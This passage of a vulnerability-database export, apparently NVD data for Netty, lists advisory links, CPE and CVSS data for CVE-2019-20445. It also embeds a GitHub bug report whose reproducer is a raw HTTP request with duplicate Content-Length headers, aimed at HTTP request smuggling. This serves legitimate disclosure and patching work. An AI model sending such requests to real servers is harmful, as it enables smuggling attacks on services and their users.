"https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948%40%3Ccommits.druid.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/re78eaef7d01ad65c370df30e45c686fffff00b37f7bfd78b26a08762%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rf2bf8e2eb0a03227f5bc100b544113f8cafea01e887bb068e8d1fa41%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f%40%3Cdev.flink.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114%40%3Ccommits.druid.apache.org%3E" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00004.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4532-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4885" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0497" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0567" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0601" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0605" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0606" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/netty/netty/issues/9866" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r059b042bca47be53ff8a51fd04d95eb01bb683f1afa209db136e8cb7%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r0aa8b28e76ec01c697b15e161e6797e88fc8d406ed762e253401106e%40%3Ccommits.camel.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r0c3d49bfdbc62fd3915676433cc5899c5506d06da1c552ef1b7923a5%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r0f5e72d5f69b4720dfe64fcbc2da9afae949ed1e9cbffa84bb7d92d7%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d%40%3Cdev.geode.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f%40%3Cissues.spark.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r34912a9b1a5c269a77b8be94ef6fb6d1e9b3c69129719dc00f01cf0b%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r489886fe72a98768eed665474cba13bad8d6fe0654f24987706636c5%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r4c675b2d0cc2a5e506b11ee10d60a378859ee340aca052e4c7ef4749%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3%40%3Ccommits.cassandra.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r8402d67fdfe9cf169f859d52a7670b28a08eff31e54b522cc1432532%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r86befa74c5cd1482c711134104aec339bf7ae879f2c4437d7ec477d4%40%3Ccommon-commits.hadoop.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r90030b0117490caed526e57271bf4d7f9b012091ac5083c895d16543%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r91e0fa345c86c128b75a4a791b4b503b53173ff4c13049ac7129d319%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d%40%3Ccommits.cassandra.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f%40%3Cdev.geode.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7%40%3Cissues.flink.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rb3361f6c6a5f834ad3db5e998c352760d393c0891b8d3bea90baa836%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rc7eb5634b71d284483e58665b22bf274a69bd184d9bd7ede52015d91%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rcb2c59428f34d4757702f9ae739a8795bda7bea97b857e708a9c62c6%40%3Ccommon-commits.hadoop.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e%40%3Cissues.flink.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rdd5d243a5f8ed8b83c0104e321aa420e5e98792a95749e3c9a54c0b9%40%3Ccommon-commits.hadoop.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/re0b78a3d0a4ba2cf9f4e14e1d05040bde9051d5c78071177186336c9%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/re78eaef7d01ad65c370df30e45c686fffff00b37f7bfd78b26a08762%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rf2bf8e2eb0a03227f5bc100b544113f8cafea01e887bb068e8d1fa41%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f%40%3Cdev.flink.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00004.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4532-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4885" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*", "matchCriteriaId": "3D374B9C-E87A-47F2-AF0C-25D2A6D03E89", "versionEndExcluding": "4.1.44", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:jboss_amq_clients:2:*:*:*:*:*:*:*", "matchCriteriaId": "491FADFF-AE11-4EDE-BD6B-64856292CA62", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2:*:*:*:*:*:*:*", "matchCriteriaId": "0C3AA5CE-9ACB-4E96-A4C1-50A662D641FB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.3:*:*:*:*:*:*:*", "matchCriteriaId": "B4911A72-5FAE-47C5-A141-2E3CA8E1CCAB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "444" ]
444
https://github.com/netty/netty/issues/9866
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "netty", "netty" ]
### Expected behavior Netty shouldn't allow the invalid fold. According to RFC7230, https://tools.ietf.org/html/rfc7230#section-3.2. ``` header-field = field-name ":" OWS field-value OWS field-name = token field-value = *( field-content / obs-fold ) field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ] field-vchar = VCHAR / obs-text obs-fold = CRLF 1*( SP / HTAB ) ; obsolete line folding ; see Section 3.2.4 ``` A Sp or HTAB should follow the CRLF. But Netty allow a CRLF without a SP or HTAB. <img width="989" alt="2019-12-10下午7 58 09" src="https://user-images.githubusercontent.com/29536474/70529731-411ccf80-1b8c-11ea-9668-e1064d7009bc.png"> ### Actual behavior Netty accept invalid fold. This may casue http smuggling. ### Steps to reproduce Send a request like this: ```http POST / HTTP/1.1 Host: example.com Connection: close Content-Length: 5 Content-Length: 6 0 ``` ### Minimal yet complete reproducer code (or URL to code) ### Netty version all ### JVM version (e.g. `java -version`) java version "1.8.0_181" ### OS version (e.g. `uname -a`) Darwin ZedddeMacBook-Pro.local 19.0.0 Darwin Kernel Version 19.0.0: Thu Oct 17 16:17:15 PDT 2019; root:xnu-6153.41.3~29/RELEASE_X86_64 x86_64
Netty shouldn't allow the invalid fold.
https://api.github.com/repos/netty/netty/issues/9866/comments
12
2019-12-10T12:38:14Z
2020-02-17T05:11:47Z
https://github.com/netty/netty/issues/9866
535,703,297
9,866
1,047
CVE-2019-20445
2020-01-29T21:15:11.110
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0497" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0567" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0601" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0605" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0606" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/netty/netty/issues/9861" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r030beff88aeb6d7a2d6cd21342bd18686153ce6e26a4171d0e035663%40%3Cissues.flume.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d%40%3Cdev.geode.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f%40%3Cissues.spark.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r46f93de62b1e199f3f9babb18128681677c53493546f532ed88c359d%40%3Creviews.spark.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3%40%3Ccommits.cassandra.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r4ff40646e9ccce13560458419accdfc227b8b6ca4ead3a8a91decc74%40%3Cissues.flume.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2%40%3Ccommits.druid.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r81700644754e66ffea465c869cb477de25f8041e21598e8818fc2c45%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d%40%3Ccommits.cassandra.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f%40%3Cdev.geode.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7%40%3Cissues.flink.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rb5c065e7bd701b0744f9f28ad769943f91745102716c1eb516325f11%40%3Cissues.spark.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": 